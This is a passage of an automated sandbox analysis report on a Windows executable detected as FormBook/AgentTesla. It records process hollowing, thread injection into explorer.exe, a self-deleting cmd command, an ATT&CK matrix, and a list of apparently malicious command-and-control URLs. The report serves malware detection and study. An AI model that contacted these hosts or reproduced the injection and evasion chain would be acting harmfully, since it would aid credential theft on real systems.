Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01742835 mov ecx, dword ptr fs:[00000030h]	5_2_01742835
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]	5_2_01742835
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]	5_2_01742835
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175A830 mov eax, dword ptr fs:[00000030h]	5_2_0175A830
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]	5_2_017C483A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]	5_2_017C483A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017AC810 mov eax, dword ptr fs:[00000030h]	5_2_017AC810
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0175C8F9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0175C8F9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EA8E4 mov eax, dword ptr fs:[00000030h]	5_2_017EA8E4
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174E8C0 mov eax, dword ptr fs:[00000030h]	5_2_0174E8C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017AC89D mov eax, dword ptr fs:[00000030h]	5_2_017AC89D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720887 mov eax, dword ptr fs:[00000030h]	5_2_01720887
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0171CB7E mov eax, dword ptr fs:[00000030h]	5_2_0171CB7E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CEB50 mov eax, dword ptr fs:[00000030h]	5_2_017CEB50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]	5_2_017D4B4B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]	5_2_017D4B4B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]	5_2_017B6B40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]	5_2_017B6B40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EAB40 mov eax, dword ptr fs:[00000030h]	5_2_017EAB40
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C8B42 mov eax, dword ptr fs:[00000030h]	5_2_017C8B42
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]	5_2_0174EB20
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]	5_2_0174EB20
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]	5_2_017E8B28
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]	5_2_017E8B28
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]	5_2_0179EB1D
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]	5_2_01728BF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]	5_2_01728BF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]	5_2_01728BF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h]	5_2_0174EBFC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h]	5_2_017ACBF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h]	5_2_017CEBD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]	5_2_01740BCB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]	5_2_01740BCB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]	5_2_01740BCB
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]	5_2_01720BCD
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]	5_2_01720BCD
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]	5_2_01720BCD
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]	5_2_01730BBE
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]	5_2_01730BBE
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]	5_2_017D4BB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]	5_2_017D4BB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]	5_2_0179CA72
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]	5_2_0179CA72
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]	5_2_0175CA6F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]	5_2_0175CA6F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]	5_2_0175CA6F
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h]	5_2_017CEA60
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]	5_2_01726A50
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]	5_2_01730A5B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]	5_2_01730A5B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]	5_2_01744A35
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]	5_2_01744A35
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175CA38 mov eax, dword ptr fs:[00000030h]	5_2_0175CA38
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h]	5_2_0175CA24
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h]	5_2_0174EA2E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h]	5_2_017ACA11
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]	5_2_0175AAEE
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]	5_2_0175AAEE
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h]	5_2_01720AD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]	5_2_01754AD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]	5_2_01754AD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]	5_2_01776ACC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]	5_2_01776ACC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]	5_2_01776ACC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]	5_2_01728AA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]	5_2_01728AA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h]	5_2_01776AA4
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h]	5_2_01758A90
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]	5_2_0172EA80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017F4A80 mov eax, dword ptr fs:[00000030h]	5_2_017F4A80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B8D6B mov eax, dword ptr fs:[00000030h]	5_2_017B8D6B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]	5_2_01720D59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]	5_2_01720D59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720D59 mov eax, dword ptr fs:[00000030h]	5_2_01720D59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]	5_2_01728D59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]	5_2_01728D59
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01728D59 mov eax, dword ptr fs:[00000030h]	5_2_01728D59

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 7_2_00C739FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,

7_2_00C739FE

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00C753F0 SetUnhandledExceptionFilter,		7_2_00C753F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00C751A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_00C751A0

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Memory written: C:\Users\user\Desktop\hj3YCvtlg7.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Thread register set: target process: 3504			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3504			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: C70000

Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 7_2_00C74ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

7_2_00C74ACA

Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.1359952336.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836251529.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.3825528277.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1356110369.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.3820418043.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1355837876.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanq

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Users\user\Desktop\hj3YCvtlg7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 7_2_00C726AE GetSystemTimeAsFileTime,

7_2_00C726AE

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	141 Virtualization/Sandbox Evasion	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	113 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hj3YCvtlg7.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
hj3YCvtlg7.exe	71%	Virustotal		Browse
hj3YCvtlg7.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.owletbaby.shop	0%	Virustotal	Browse
www.helyibudapest.com	0%	Virustotal	Browse
www.mingshengglass.com	0%	Virustotal	Browse
oregonjobs.co	1%	Virustotal	Browse
ethicai.pro	1%	Virustotal	Browse
www.bombslot-42.co	0%	Virustotal	Browse
www.kidscircle.shop	0%	Virustotal	Browse
www.ethicai.pro	0%	Virustotal	Browse
www.yoursweets.online	0%	Virustotal	Browse
www.erabits.com	0%	Virustotal	Browse
www.mayorii.com	0%	Virustotal	Browse
www.oregonjobs.co	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.stacker.com/arizona/phoenix	0%	URL Reputation	safe
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.yoursweets.online	100%	Avira URL Cloud	malware
http://www.oregonjobs.co/vr01/	0%	Avira URL Cloud	safe
http://www.poseidoncrm.comReferer:	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
http://www.mayorii.com/vr01/www.oregonjobs.co	0%	Avira URL Cloud	safe
http://www.helyibudapest.comReferer:	0%	Avira URL Cloud	safe
http://www.owletbaby.shop/vr01/	0%	Avira URL Cloud	safe
http://www.helyibudapest.com/vr01/www.poseidoncrm.com	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	0%	Virustotal		Browse
http://www.elcaporalburley.com/vr01/www.molobeverello.com	0%	Avira URL Cloud	safe
http://www.elcaporalburley.comReferer:	0%	Avira URL Cloud	safe
http://www.oregonjobs.coReferer:	0%	Avira URL Cloud	safe
http://www.mingshengglass.com/vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP	0%	Avira URL Cloud	safe
http://www.oregonjobs.co/vr01/	0%	Virustotal		Browse
http://www.erabits.com/vr01/	0%	Avira URL Cloud	safe
http://www.yoursweets.online	0%	Virustotal		Browse
http://www.bombslot-42.co/vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP	0%	Avira URL Cloud	safe
http://www.erabits.com/vr01/www.mingshengglass.com	0%	Avira URL Cloud	safe
http://www.owletbaby.shop/vr01/	0%	Virustotal		Browse
http://www.kidscircle.shopReferer:	0%	Avira URL Cloud	safe
www.yoursweets.online/vr01/	100%	Avira URL Cloud	malware
http://www.yesxoit.xyz/vr01/www.elcaporalburley.com	0%	Avira URL Cloud	safe
http://www.ethicai.pro/vr01/	0%	Avira URL Cloud	safe
http://www.erabits.com/vr01/	0%	Virustotal		Browse
http://www.bombslot-42.co	0%	Avira URL Cloud	safe
http://www.yesxoit.xyzReferer:	0%	Avira URL Cloud	safe
http://www.oregonjobs.co	0%	Avira URL Cloud	safe
http://www.owletbaby.shop	0%	Avira URL Cloud	safe
http://www.jupitr-claim.top/vr01/www.nicolbauer.com	100%	Avira URL Cloud	malware
http://www.bombslot-42.co	0%	Virustotal		Browse
http://www.ethicai.pro/vr01/	0%	Virustotal		Browse
http://www.jupitr-claim.top	100%	Avira URL Cloud	malware
http://www.nicolbauer.comReferer:	0%	Avira URL Cloud	safe
http://www.mayorii.comReferer:	0%	Avira URL Cloud	safe
http://www.owletbaby.shop	0%	Virustotal		Browse
http://www.ethicai.pro/vr01/www.owletbaby.shop	0%	Avira URL Cloud	safe
www.yoursweets.online/vr01/	2%	Virustotal		Browse
